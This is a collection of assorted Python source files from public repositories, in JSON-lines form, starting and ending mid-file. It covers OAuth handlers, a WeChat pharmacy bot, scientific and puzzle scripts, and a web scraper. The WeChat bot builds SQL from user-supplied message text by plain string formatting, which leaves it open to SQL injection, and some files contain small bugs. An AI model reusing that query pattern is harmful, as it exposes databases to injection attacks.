self.reset_credentials()\n if state:\n login_url = \"%s?state=%s\" % (config.LOGIN_URL, state,)\n else:\n login_url = config.LOGIN_URL\n self.response.write(\n ''\n '

    Wrong domain

    '\n '

    Your account is not managed by our domains (%s).

    '\n '

    '\n ' Try login again with an other account.'\n '

    '\n '' % (\n ', '.join(config.VALID_DOMAINS.keys()),\n login_url,\n )\n )\n return\n except InvalidClientSecretsError:\n self.abort(\n 500, \"Failed to load Oauth service account client secrets.\"\n )\n except InvalidCredentialsError:\n redirect_uri = self._state_oauth_flow(redirect_uri)\n\n self.redirect(str(redirect_uri))\n\n def _state_oauth_flow(self, redirect_uri):\n try:\n self.flow.params['state'] = sign_return_url(\n redirect_uri, self.session_id()\n )\n return self.flow.step1_get_authorize_url()\n except InvalidClientSecretsError:\n self.abort(500, \"Failed to load Oauth client secrets.\")\n\n\nclass LogoutHandler(webapp2.RequestHandler, SessionMixin):\n\n def dispatch(self):\n return SessionMixin.dispatch(self)\n\n def get(self):\n state = self.request.GET.get('state', None)\n if state:\n try:\n redirect_uri = validate_return_url(\n str(state), self.session_id()\n )\n except InvalidXsrfTokenError:\n redirect_uri = config.DEFAULT_RETURN_URL\n else:\n redirect_uri = config.DEFAULT_RETURN_URL\n\n self.reset_credentials()\n self.response.write(\n ''\n 'You are logged out. '\n 'Return'\n '' % redirect_uri\n )\n\n\nclass OauthCallbackHandler(webapp2.RequestHandler, SessionMixin):\n \"\"\"Handle exchanges of authorization code.\n\n \"\"\"\n\n def dispatch(self):\n return SessionMixin.dispatch(self)\n\n def get(self):\n error = self.request.get('error')\n if error:\n errormsg = self.request.get('error_description', error)\n self.abort(\n 400,\n 'The authorization request failed: %s' % _safe_html(errormsg)\n )\n return\n\n state = self.request.GET.get('state', None)\n try:\n validate_return_url(\n str(state), self.session_id()\n )\n except InvalidXsrfTokenError:\n self.abort(400, 'Failed to validate state')\n\n credentials = self.flow.step2_exchange(self.request.params)\n self.save_credentials(credentials)\n self.redirect(\"%s?state=%s\" % (config.LOGIN_URL, state,))\n","repo_name":"gayancliyanage/education","sub_path":"src/education/core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34752721954","text":"# My name is Sofya.I am a 1st year CS student.\r\n# This program computes volume for a cube, a pyramid and an ellipsoid.\r\n\r\n# Create lists to store the results of volume calculations.\r\nlistCubeVolume=[]\r\nlistPyramidVolume=[]\r\nlistEllipsoidVolume=[]\r\n\r\n# Create functions to calculate and return volume for different shapes.\r\ndef cubeVolume(sideLength):\r\n volumeCube = round(sideLength ** 3, 1)\r\n listCubeVolume.append(str(volumeCube))\r\n print(\"The volume of a cube with a length of side of \"+str(sideLength)+\" is \"+str(volumeCube))\r\n\r\ndef pyramidVolume(height, baseLength):\r\n volumePyramid = round(1/3 * baseLength ** 2 * height, 1)\r\n listPyramidVolume.append(str(volumePyramid))\r\n print(\"The volume of a pyramid with the base length of \"+str(baseLength)+\" and the height of \"+str(height)+\" is \"+str(volumePyramid))\r\n\r\ndef ellipsoidVolume(r1, r2, r3):\r\n import math\r\n volumeEllipsoid = round((4/3 * math.pi * r1 * r2 * r3), 1)\r\n listEllipsoidVolume.append(str(volumeEllipsoid))\r\n print(\"The volume of an ellipsoid with three radius of \"+str(r1)+\" ,\"+str(r2)+\" ,\"+str(r3)+\" is \"+str(volumeEllipsoid)+\"\")\r\n\r\n# Ask user for the shape that he wants to know the volume of.\r\n# Based on the users input, prompt them for the necessary dimensions.\r\ndef computeVolume():\r\n shape = input('I will calculate the volume of a shape. What shape are you interested in?').lower()\r\n while shape != 'quit':\r\n if shape == 'cube':\r\n sideLength = int(input(\"What will be the length of the side for a cube? Enter:\" ))\r\n cubeVolume(sideLength)\r\n return computeVolume()\r\n elif shape == 'pyramid':\r\n baseLength = int(input(\"What will be the base length of a pyramid? Enter:\"))\r\n height = int(input(\"What will be the height of a pyramid? Enter:\"))\r\n pyramidVolume(height, baseLength)\r\n return computeVolume()\r\n elif shape == 'ellipsoid':\r\n r1=int(input(\"The first radius will be:\"))\r\n r2=int(input(\"The second radius will be:\"))\r\n r3=int(input(\"The third radius will be:\"))\r\n ellipsoidVolume(r1, r2, r3)\r\n return computeVolume()\r\n else:\r\n print(\"Invalid shape. You can enter 'cube', 'pyramid', 'ellipsoid' or, to end the session, 'quit'\")\r\n return computeVolume()\r\n\r\n# Make sure that loop will end as the user asks to quit the program.\r\n if shape == \"quit\":\r\n print(\"You have come to the end of the session.\")\r\n if len(listCubeVolume) == 0 and len(listPyramidVolume) == 0 and len(listEllipsoidVolume) == 0:\r\n print(\"You did not perform any volume calculations.\")\r\n else:\r\n print(\"The volumes calculated for each shape are shown below\")\r\n if len(listCubeVolume) == 0:\r\n print(\"\\nCube: No computations for this shape\", end=\"\")\r\n else:\r\n listCubeVolume.sort()\r\n print(\"\\nCube: \", end=\"\")\r\n for i in listCubeVolume:\r\n print(i,end=\",\")\r\n\r\n if len(listPyramidVolume) == 0:\r\n print(\"\\nPyramid: No computations for this shape\", end=\"\")\r\n else:\r\n listPyramidVolume.sort()\r\n print(\"\\nPyramid: \", end=\"\")\r\n for i in listPyramidVolume:\r\n print(i, end=\",\")\r\n\r\n if len(listEllipsoidVolume) == 0:\r\n print(\"\\nEllipsoid: No computations for this shape\", end=\"\")\r\n else:\r\n listEllipsoidVolume.sort()\r\n print(\"\\nEllipsoid: \", end=\"\")\r\n for i in listEllipsoidVolume:\r\n print(i, end=\",\")\r\n\r\n# The program starts.\r\ncomputeVolume()\r\n","repo_name":"sofya7/python-projects","sub_path":"spryadko_Assign2.py","file_name":"spryadko_Assign2.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27012938345","text":"# Functions for stimulus-aligning the data; organizing\n# data by trial versus sequentially and reshaping between\n# these two forms; etc.\n\nimport numpy as np\n\n\ndef align_by_stimulus(movie, stimulus_vector, time_before, time_after, reward_vector):\n n_frames, n_pixels = movie.shape\n f = {}\n f['stimulus_times'] = np.where(stimulus_vector != 0)[0]\n f['stimulus_contrast'] = stimulus_vector[f['stimulus_times']]\n n_trials = f['stimulus_times'].size\n trial_length = time_after + time_before\n f['start_times'] = np.maximum(0, f['stimulus_times'] - time_before)\n f['end_times'] = np.minimum(n_frames, f['stimulus_times'] + time_after)\n f['data'] = np.empty((n_trials, trial_length, n_pixels))\n for i in range(n_trials):\n f['data'][i] = movie[f['start_times'][i]:f['end_times'][i],:]\n f['reward_times'] = np.where(reward_vector != 0)[0]\n f['was_reward'] = np.zeros(n_trials)\n for i in range(f['reward_times'].size):\n f['was_reward'] = np.logical_or(f['was_reward'], np.logical_and(f['reward_times'][i] > f['stimulus_times'], f['reward_times'][i] < f['end_times']))\n return f\n\n# Takes a movie that is organized by trials and returns a movie organized sequentially\n# (3-dim to 2-dim). Left and right truncation values can be used if you don't want to\n# use the full length of the trial.\ndef reshape_trial_to_sequence(movie, left_truncation=0, right_truncation=0):\n n_trials, n_timesteps, n_pixels = movie.shape\n n_samples = n_trials*(n_timesteps - left_truncation - right_truncation)\n start_idx = left_truncation\n if right_truncation == 0:\n return movie[:,left_truncation:,:].reshape((n_samples, n_pixels))\n else:\n return movie[:,left_truncation:-right_truncation,:].reshape((n_samples, n_pixels))\n\n\ndef reshape_sequence_to_trial(movie, n_trials):\n n_samples, n_pixels = movie.shape\n return movie.reshape((n_trials, n_samples/n_trials, n_pixels))","repo_name":"kpchamp/widefield","sub_path":"widefield/tools/alignment.py","file_name":"alignment.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5052609490","text":"\"\"\"\r\nQ-11:Represent a small bilingual (english-swedish) glossary given below as a python dictionary{\"merry\":\"god,\",\"chirstmas\":\"jul,\",\"and\":\"och\",\"happy\":\"gott\",\"new\":\"nytt\",\"year\":\"ar\"}and use it\r\nto translate your chirstmas wishes from english into swedish.that is, write a python function translate() that accepts the bilingual dictionary and a list of english words (your christmas\r\nwish) and returns a list of equivalent swedish words.\r\n\"\"\"\r\n\r\ndef translate(dict1,list1):\r\n list2=[]\r\n for i in list1:\r\n list2.append(dict1[i])\r\n return list2\r\ndict1={\"merry\":\"god,\",\"christmas\":\"jul\",\"and\":\"och\",\"happy\":\"gott\",\"new\":\"nytt\",\"year\":\"ar\"}\r\nlist1=[\"merry\",\"christmas\"]\r\nprint(translate(dict1,list1))\r\n\r\n\r\n","repo_name":"Ambika-dot/python_programming","sub_path":"python_Q_11.py","file_name":"python_Q_11.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10658943357","text":"#*************************************************************************************#\n# #\n# SUPERSONIC FLOW OVER A CONE #\n# #\n# (by solving Taylor-Maccoll equation) #\n# #\n#*************************************************************************************#\n\n#********************************* DESCRIPTION ***************************************\n\n\n\n#*********************************** INPUT *******************************************\n\nT0 = 300.0 # Total freestream temperature (K)\nC_p = 1005.0 # Specific heat at constant pressure (J/kg/K)\nbeta = 40.0 # Wave angle (degrees)\nM_inf = 2.0 # Freestream Mach number \ngamma = 1.4 # Adiabatic constant\n\n#***************************** IMPORTING PACKAGES ************************************\n# Standard packages\nfrom matplotlib.pyplot import *\nimport numpy as np\nimport math\n\n# User-defined packages\nfrom oblique_shock import *\nfrom taylor_maccoll import *\n\n#******************************** COMPUTATION ****************************************\n\nV_max = math.sqrt(2*C_p*T0) # Max theoretical speed\n[M_2, delta, beta] = oblique_shock_wave_properties(M_inf, beta, gamma)\n\n# Setting up initial conditions\nV = math.pow(2/((gamma - 1)*M_2**2) + 1, -0.5)\nV_r = [V*math.cos(beta - delta)]\nV_theta = [V*math.sin(beta - delta)]\n\n\n# Starting computations\ndel_theta = 10**-5\nerr = 1.0\ntol = 10.0**-8\n\ntheta = [beta]\ni = 0\n\nprint(\"Starting computation\")\nwhile err>tol:\n [V_r_local, V_theta_local] = euler_step_integration(theta[i], del_theta, gamma, V_r[i], V_theta[i])\n V_theta += [V_theta_local]\n V_r += [V_r_local]\n err = V_theta[i]\n print(err)\n i += 1\n theta = theta + [beta - i*del_theta]\n print(\"Ran incremental step : \"+str(i))\n \nprint(\"Semi-apex angle of the cone is \"+ str(theta[-1]*180/math.pi))\n\n# Checking\n\n\n\n\n\n\n\n\n\n# Writing to data files (preferably .vtk files)\nplot(np.array(theta)*180/math.pi, V_theta)\nxlabel(\"Theta (in degrees)\")\nylabel(\"V_theta\")\nshow()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"kcavatar/conical_flow","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42047638867","text":"import sys\n\nfrom aoc import read_input\n\n\ndef count_neighbour_faces_not_connected(x, y, z, this_face):\n faces = 6\n if x > 0 and cubes[x - 1][y][z] == this_face: faces -= 1\n if x < max_dimension and cubes[x + 1][y][z] == this_face: faces -= 1\n if y > 0 and cubes[x][y - 1][z] == this_face: faces -= 1\n if y < max_dimension and cubes[x][y + 1][z] == this_face: faces -= 1\n if z > 0 and cubes[x][y][z - 1] == this_face: faces -= 1\n if z < max_dimension and cubes[x][y][z + 1] == this_face: faces -= 1\n return faces\n\n\ndef flood_fill(x, y, z):\n if x < 0 or x > max_dimension or 0 < y > max_dimension or z < 0 or z > max_dimension:\n return\n if cubes[x][y][z] != 0:\n return\n\n cubes[x][y][z] = 2\n flood_fill(x + 1, y, z)\n flood_fill(x - 1, y, z)\n flood_fill(x, y + 1, z)\n flood_fill(x, y - 1, z)\n flood_fill(x, y, z + 1)\n flood_fill(x, y, z - 1)\n\n\nif __name__ == \"__main__\":\n # Construction\n lines = read_input(\"day18\", str)\n max_dimension = 0\n sys.setrecursionlimit(10000)\n print(sys.getrecursionlimit())\n for line in lines:\n x, y, z = line.split(\",\")\n max_dimension = max(max_dimension, int(x), int(y), int(z))\n\n cubes = [[[0 for x in range(max_dimension + 1)] for y in range(max_dimension + 1)] for z in\n range(max_dimension + 1)]\n for line in lines:\n x, y, z = line.split(\",\")\n cubes[int(x)][int(y)][int(z)] = 1\n\n # Part 1 - find all the faces\n total_faces = 0\n for x in range(max_dimension + 1):\n for y in range(max_dimension + 1):\n for z in range(max_dimension + 1):\n if cubes[x][y][z] == 1:\n total_faces += count_neighbour_faces_not_connected(x, y, z, 1)\n print(total_faces)\n assert total_faces == 4348\n # p1 = 4348\n\n # Part 2 - remove all the air bubbles\n flood_fill(0, 0, 0)\n air_bubbles = 0\n for x in range(max_dimension + 1):\n for y in range(max_dimension + 1):\n for z in range(max_dimension + 1):\n if cubes[x][y][z] == 0:\n air_bubbles += count_neighbour_faces_not_connected(x, y, z, 0)\n print(total_faces - air_bubbles)\n assert total_faces - air_bubbles == 2546\n # p2 = 2546\n","repo_name":"EthanArcher/adventofcode2022","sub_path":"day18.py","file_name":"day18.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21525771375","text":"import json,time,os,socket,threading\n\nwx_gz_id = os.getenv('WX_GZ_ID')\nreply_text_template = '''\n\n\n{2}\n\n\n'''\n\ndef DBProxy_exec(json_data):\n data = json.dumps(json_data)\n print(data)\n with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:\n sock.sendto(data.encode(),(\"127.0.0.1\", 9999))\n data, from_addr = sock.recvfrom(10240)\n print(data)\n return json.loads(data.decode())\n return None\n\n# get user phone(member ID) and membership shop\ndef DBProxy_getUser(wx_id):\n sql = \"SELECT TOP 1 DH, LLBM FROM BM_WLDW WHERE CZ='{0}'\".format(wx_id)\n data = {}\n data['SQL'] = sql\n data = DBProxy_exec(data)\n if data and isinstance(data,list) and data[0] and isinstance(data[0],list) and data[0][0]:\n return (data[0][0],data[0][1])\n else:\n return (None,None)\n\ndef DBProxy_userPoints(wx_id):\n sql = \"SELECT SYJF FROM BM_WLDW WHERE CZ='{0}'\".format(wx_id)\n data={}\n data['SQL']=sql\n data = DBProxy_exec(data)\n if data and isinstance(data,list) and data[0] and isinstance(data[0],list):\n return data[0][0]\n else:\n return None\n\n# calculate drugs available number with sales data and receipt data\ndef DBProxy_getDrugs(drugName,shop):\n sql = \"SELECT SUM(SL), YPMC, SCCJ FROM XSD_MX WHERE YPMC like '%{0}%' and CKBM like '{1}%' group by YPMC, SCCJ\".format(drugName, shop)\n sale_data={}\n sale_data['SQL']=sql\n sale_data = DBProxy_exec(sale_data)\n if not sale_data and not isinstance(sale_data,list) and not sale_data[0] and not isinstance(sale_data[0],list):\n return None\n\n sql = \"SELECT SUM(SL), YPMC, SCCJ FROM RKD_MX WHERE YPMC like '%{0}%' and CKBM like '{1}%' group by YPMC, SCCJ\".format(drugName, shop)\n receipt_data={}\n receipt_data['SQL']=sql\n receipt_data = DBProxy_exec(receipt_data)\n if not receipt_data and not isinstance(receipt_data,list) and not receipt_data[0] and not isinstance(receipt_data[0],list):\n return None\n\n for receipt_item in receipt_data:\n for sale_item in sale_data:\n if sale_item[1] == receipt_item[1] and sale_item[2] == receipt_item[2]:\n receipt_item[0] = float(receipt_item[0]) - float(sale_item[0])\n return receipt_data\n \nclass WXStateInit:\n def __init__(self, WXUser):\n self.wx_user = WXUser\n\n def handle(self,data):\n \n if 'EventKey' in data and data['EventKey'] == 'HUI_USER_BONDING':\n phone = self.wx_user.getPhone()\n if phone:\n return reply_text_template.format(self.wx_user.wx_id, wx_gz_id, int(time.time()), '您已绑定过会员号({0}),如需更改请留言“重新绑定会员+手机号码”'.format(phone))\n\n self.wx_user.state = WXStateBonding(self.wx_user)\n return reply_text_template.format(self.wx_user.wx_id, wx_gz_id, int(time.time()), '请输入在本店注册会员时登记的手机号码:')\n\n elif 'EventKey' in data and data['EventKey'] == 'HUI_USER_POINTS':\n points = DBProxy_userPoints(self.wx_user.wx_id)\n if points:\n msg = '您的积分余额为: {0} (在门店每消费一元累积一个积分)'.format(points)\n return reply_text_template.format(self.wx_user.wx_id, wx_gz_id, int(time.time()), msg)\n else:\n return reply_text_template.format(self.wx_user.wx_id, wx_gz_id, int(time.time()), '查询失败,您未绑定会员号或者您还没有积分记录')\n elif 'EventKey' in data and data['EventKey'] == 'HUI_USER_DRUGS':\n self.wx_user.state = WXStateQueryDrugs(self.wx_user)\n return reply_text_template.format(self.wx_user.wx_id, wx_gz_id, int(time.time()), '请输入药品名称:')\n elif 'EventKey' in data and data['EventKey'] == 'HUI_USER_PURCHASE':\n return reply_text_template.format(self.wx_user.wx_id, wx_gz_id, int(time.time()), '该功能正在开发,敬请期待')\n elif 'EventKey' in data and data['EventKey'] == 'HUI_USER_MESSAGE':\n return reply_text_template.format(self.wx_user.wx_id, wx_gz_id, int(time.time()), '该功能正在开发,敬请期待')\n elif 'EventKey' in data:\n return reply_text_template.format(self.wx_user.wx_id, wx_gz_id, int(time.time()), '公众号暂时无法识别该指令')\n elif 'Content' in data:\n return reply_text_template.format(self.wx_user.wx_id, wx_gz_id, int(time.time()), '公众号无法识别您的输入,您可以通过菜单发起指令')\n \nclass WXStateBonding:\n def __init__(self, WX_Manager):\n self.wx_manager = WX_Manager\n\n def handle(self, data):\n if 'Content' in data:\n sql = \"UPDATE BM_WLDW SET CZ='{0}' WHERE DH = '{1}'\".format(self.wx_manager.wx_id , data['Content'])\n json_data={}\n json_data['SQL']=sql\n json_data = DBProxy_exec(json_data)\n self.wx_manager.state = WXStateInit(self.wx_manager)\n if json_data and json_data[0] == 1:\n return reply_text_template.format(self.wx_manager.wx_id, wx_gz_id, int(time.time()), '绑定成功')\n else:\n return reply_text_template.format(self.wx_manager.wx_id, wx_gz_id, int(time.time()), '绑定失败,若您还不是会员,可至门店注册,或给留言“注册会员+手机号码”')\n else:\n return reply_text_template.format(self.wx_manager.wx_id, wx_gz_id, int(time.time()), '目前正在绑定会员,请输入在门店注册会员时登记的手机号码:')\n \nclass WXStateQueryDrugs:\n def __init__(self, WXUser):\n self.wx_user = WXUser\n\n def handle(self, data):\n if 'Content' in data:\n data = DBProxy_getDrugs(data['Content'],self.wx_user.getShop())\n \n if len(data) > 10:\n return reply_text_template.format(self.wx_user.wx_id, wx_gz_id, int(time.time()), '查询结果过多,请您提供更准确的药品名称:')\n\n self.wx_user.state = WXStateInit(self.wx_user)\n result = \"名称\\t厂家\\t数量\\n--------------------\"\n for item in data:\n if item[0] > 0:\n result = \"{0}\\n{1}\\t{2}\\t{3}\".format(result, item[1], item[2], item[0])\n result = result + \"\\n--------------------\\n查询成功,数据可能存在误差,仅供参考\"\n return reply_text_template.format(self.wx_user.wx_id, wx_gz_id, int(time.time()), result)\n else:\n return reply_text_template.format(self.wx_manager.wx_id, wx_gz_id, int(time.time()), '目前正在查询药品,请输入药品名称:')\n\nclass WXManager:\n cached_user = {}\n def __init__(self, WX_ID):\n self.wx_id = WX_ID\n self.state = WXStateInit(self)\n self.time = int(time.time())\n self.phone, self.shop = DBProxy_getUser(WX_ID)\n\n def getPhone(self):\n return self.phone\n\n def getShop(self):\n return self.shop\n\n def isExpired(self,cur_time):\n if cur_time - self.time > 300:\n return True\n return False\n\n def handle(self,data):\n result = self.state.handle(data)\n return result\n\n @staticmethod\n def getUser(WX_ID):\n if WX_ID not in WXManager.cached_user:\n WXManager.cached_user[WX_ID] = WXManager(WX_ID)\n return WXManager.cached_user[WX_ID]\n\n @staticmethod\n def remove(WX_ID):\n if WX_ID in WXManager.cached_user:\n print(\"WXManager remove {0} from cache\".format(WX_ID))\n WXManager.cached_user.pop(WX_ID)\n\n @staticmethod\n def expire():\n expire_list = []\n int_time = int(time.time())\n for wx_id in WXManager.cached_user:\n wx_user=WXManager.getUser(wx_id)\n if wx_user.isExpired(int_time):\n expire_list.append(wx_id)\n for wx_id in expire_list:\n WXManager.remove(wx_id)\n timer = threading.Timer(200,WXManager.expire)\n timer.start()\n\ntimer = threading.Timer(200,WXManager.expire)\ntimer.start()\n","repo_name":"yelloworangecc/website","sub_path":"py/WXManager.py","file_name":"WXManager.py","file_ext":"py","file_size_in_byte":8228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27269954335","text":"import numpy as np\n\na = np.array([1, 1, -129, 171, 1620])\np = np.poly1d(a)\nspace = np.arange(-46, 15)\nminmax = np.array([float('inf'), float('-inf')])\nfor x in space:\n y = p(x)\n minmax[0] = min(minmax[0], y)\n minmax[1] = max(minmax[1], y)\nprint(minmax)","repo_name":"cozajeden/Podstawy_Sterowania_Optymalnego","sub_path":"snippets/lab1/zad3_1.py","file_name":"zad3_1.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17259600794","text":"import logging\nfrom .AnaplanConnection import AnaplanConnection\nfrom .util.Util import ResourceNotFoundError\nfrom .util.AnaplanVersion import AnaplanVersion\nfrom .AnaplanRequest import AnaplanRequest\n\nlogger = logging.getLogger(__name__)\n\n\nclass Resources:\n @staticmethod\n def get_resource_request(conn: AnaplanConnection, resource: str) -> AnaplanRequest:\n \"\"\"Get the list of items of the specified resource\n\n\n \"\"\"\n base_url = f\"https://api.anaplan.com/{AnaplanVersion.major()}/{AnaplanVersion.minor()}/workspaces/\"\n valid_resources = [\"imports\", \"exports\", \"actions\", \"processes\", \"files\", \"lists\", \"modules\"]\n get_header = {\n 'Content-Type': 'application/json'\n }\n\n if resource.lower() in valid_resources:\n url = ''.join([base_url, conn.get_workspace(), \"/models/\", conn.get_model(), \"/\", resource.lower()])\n return AnaplanRequest(url=url, header=get_header)\n else:\n raise ResourceNotFoundError(f\"Invalid selection, resource must be one of {', '.join(valid_resources)}\")\n\n @staticmethod\n def parse_resource_request():\n pass\n","repo_name":"jeswils-ap/anaplan_transactional_api","sub_path":"src/anaplan_api/Resources.py","file_name":"Resources.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30473354282","text":"from abc import ABC, abstractmethod\nimport numpy as np\nimport logging\n\n#from typing import Tuple\nimport numpy.typing as npt\n\nPrices = npt.NDArray\nBundle = npt.NDArray\n\nclass VolumeBundle:\n value : Bundle\n volume : Bundle\n def __init__(self, value, volume):\n assert np.all(volume>= 0)\n assert np.shape(value) == np.shape(volume)\n self.value = value\n self.volume = volume\n\n @classmethod\n def zero(cls, shape):\n return VolumeBundle(np.zeros(shape), np.zeros(shape))\n\n def __add__(self, other):\n assert isinstance(other, VolumeBundle)\n assert other.shape() == self.shape()\n logging.debug(\"add creates new volume bundle\")\n return VolumeBundle(self.value + other.value,\n self.volume + other.volume)\n\n def __iadd__(self, other):\n assert isinstance(other, VolumeBundle)\n assert other.shape() == self.shape()\n self.value += other.value\n self.volume += other.volume\n return self\n\n def add_at_ix(self, ix : int, value : float): \n self.value[ix] += value\n self.volume[ix] += abs(value)\n\n def add_at_slice(self, sl : slice, other):\n assert isinstance(other, VolumeBundle)\n assert other.shape() == self.value[sl].shape\n self.value[sl] += other.value\n self.volume[sl] += other.volume\n \n def __str__(self):\n return str(self.value) + \" with volume \" + str(self.volume)\n\n def shape(self):\n return self.value.shape\n\n\nclass Participant(ABC):\n @abstractmethod\n def participate(self, prices : Prices) -> VolumeBundle:\n ...\n\n","repo_name":"johannesmarti/pytrade","sub_path":"core/participant.py","file_name":"participant.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11541675036","text":"#!/usr/bin/env python3.6\n\n# -*- coding: utf-8 -*-\n\n\"\"\"\n__author__ = 'jasonqu'\n\n__date__ = '2018/5/29'\n\n__QQ__ = '376205871'\n\n\"\"\"\nfrom scrapy.spiders import Rule\nfrom scrapy.linkextractors import LinkExtractor\nfrom corpus_health.items import CorpusHealthItem\nfrom scrapy_redis.spiders import RedisCrawlSpider\nimport urllib.parse\nfrom math import floor\nimport re\n\nfrom corpus_health.Util.LogHandler import LogHandler\nlogger = LogHandler(__name__, stream=True)\n\nclass Ask120Spider(RedisCrawlSpider):\n handle_httpstatus_list = [404, 403, 500]\n name = 'ask120'\n allowed_domains = ['120ask.com']\n # start_urls = [\n # 'http://www.120ask.com/list/gaoxueya/',\n # 'http://www.120ask.com/list/gaoxueya/all/2/'\n # 'http://www.120ask.com/list/tangniaobing/'\n # 'http://www.120ask.com/list/guanxinbing/'\n # 'http://www.120ask.com/list/ganmao/'\n # 'http://www.120ask.com/list/jingzhuibing/'\n # 'https://www.120ask.com/list/zhifanggan/'\n # 'http://www.120ask.com/list/tongfeng/'\n # 'https://www.120ask.com/list/laonianchidai/'\n # 'https://www.120ask.com/list/yaozhuibing/'\n # ]\n redis_key = 'ask120:start_urls'\n\n rules = (\n Rule(LinkExtractor(allow=r\"//www.120ask.com/list/gaoxueya/all/\\d+/$\"), follow=True),\n Rule(LinkExtractor(allow=r\"http://www.120ask.com/question/\\d+\\.htm$\"), callback=\"parse_detail_mongo\", follow=False),\n )\n\n def parse_detail(self, response):\n item = CorpusHealthItem()\n try:\n item['url'] = response.url\n item['question'] = response.xpath('//p[@class=\"crazy_new\"]/text()').extract()[1].strip()\n answerList = response.xpath('//div[@class=\"b_anscont_cont\"][1]/div[@class=\"crazy_new\"]/p/text()').extract()\n answer = \"\".join(answerList)\n item['answer'] = \"\".join(answer.split())\n yield item\n except Exception as e:\n print(e)\n logger.info(\"匹配信息出错。错误原因:\")\n logger.info(e)\n\n def parse_detail_mongo(self, response):\n item = CorpusHealthItem()\n try:\n item['url'] = response.url\n question = response.xpath('//h1[@id=\"d_askH1\"]').extract()[0]\n askTxt = self.filter_tags_blank(question)\n try:\n desc = response.xpath('//p[@class=\"crazy_new\"][1]').extract()[0]\n descText = self.filter_tags_blank(desc)\n except Exception as e:\n descText = ''\n item['question'] = {'askText': askTxt, 'askDesc': descText}\n try:\n answerList = response.xpath('//div[@class=\"b_anscont_cont\"]')\n itemList = []\n for index, answerli in enumerate(answerList):\n answer_each = answerli.xpath('.//div[@class=\"crazy_new\"]/p/text()').extract()\n answer = \"\".join(answer_each)\n itemList.append(\"\".join(answer.split()))\n item['answer'] = itemList\n except Exception as e:\n item['answer'] = ''\n # print(item)\n # print(item['answer'])\n yield item\n except Exception as e:\n print(e)\n logger.info(\"匹配信息出错。错误原因:\")\n logger.info(e)\n\n \"\"\"\n 去掉html标签和空格\n \"\"\"\n def filter_tags_blank(self, str):\n p = re.compile('<[^>]+>').sub(\"\", str)\n return \"\".join(p.split())\n","repo_name":"bzqweiyi/Algorithm","sub_path":"Corpus/corpus_health/spiders/spider_120ask.py","file_name":"spider_120ask.py","file_ext":"py","file_size_in_byte":3449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7522863346","text":"# Oliver Hollis\n# CTI 110\n# M5HW2: Running Total\n# Oct 27 2017\n\n# Write a program that asks the user to enter a series of numbers.\n# It should loop, adding these numbers to a running total, until the\n# user enters a negative number. When a negative number is entered,\n# the program should exit the loop. (It should not add the negative\n# number to the total.) The program should then print the total before\n# exiting.\n\ndef main():\n\n # the sum equals 0 until added\n \n total = 0\n\n # user inputs #'s used \"float\" for decimals input \n\n number_entered = float(input( \"Enter the first #: \"))\n\n # \"while\" keeps answering user for info until quit with -1\n\n while number_entered > -1:\n total = total + number_entered\n number_entered = float(input(\"Enter next # or a -1 to stop: \"))\n\n # display sum \n\n print(\"Your total: \", total)\n \n\nmain() \n","repo_name":"holliso/cti110","sub_path":"M5HW2_Running Total_holliso.PY","file_name":"M5HW2_Running Total_holliso.PY","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10251069422","text":"def selection_sort(unsorted):\n n = len(unsorted)\n\n for i in range(n - 1):\n min_index = i # assume 1st element is minimum\n # scan to find the real minimum number\n for j in range(i + 1, n):\n if unsorted[j] < unsorted[min_index]:\n min_index = j\n\n tmp = unsorted[i]\n unsorted[i] = unsorted[min_index]\n unsorted[min_index] = tmp\n\n return unsorted\n\n\nif __name__ == '__main__':\n # numbers = [4, 2, 5, 7, 1, 3]\n numbers = [7, 5, 4, 3, 2, 1]\n print(selection_sort(numbers))\n","repo_name":"perrydzhu/pydem0","sub_path":"algorithm/sorting/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21455253025","text":"# -*- coding: utf-8 -*-\nclass Solution(object):\n def countCornerRectangles(self, grid):\n \"\"\"\n Time: O(m**2*n)\n Space: O(1)\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n res = 0\n for i in range(len(grid)-1):\n for j in range(i+1, len(grid)):\n count = 0\n for v1, v2 in zip(grid[i],grid[j]):\n if v1 == v2 == 1:\n res += count\n count += 1\n return res","repo_name":"jerrt2003/leetcode-in-python","sub_path":"Interview_Feedback/Google/750. Number Of Corner Rectangles/Solution1.py","file_name":"Solution1.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38933632927","text":"#these functions read and manage kiinteisto/adderess register either from local file\r\n#or from given address\r\n\r\n\r\ndef 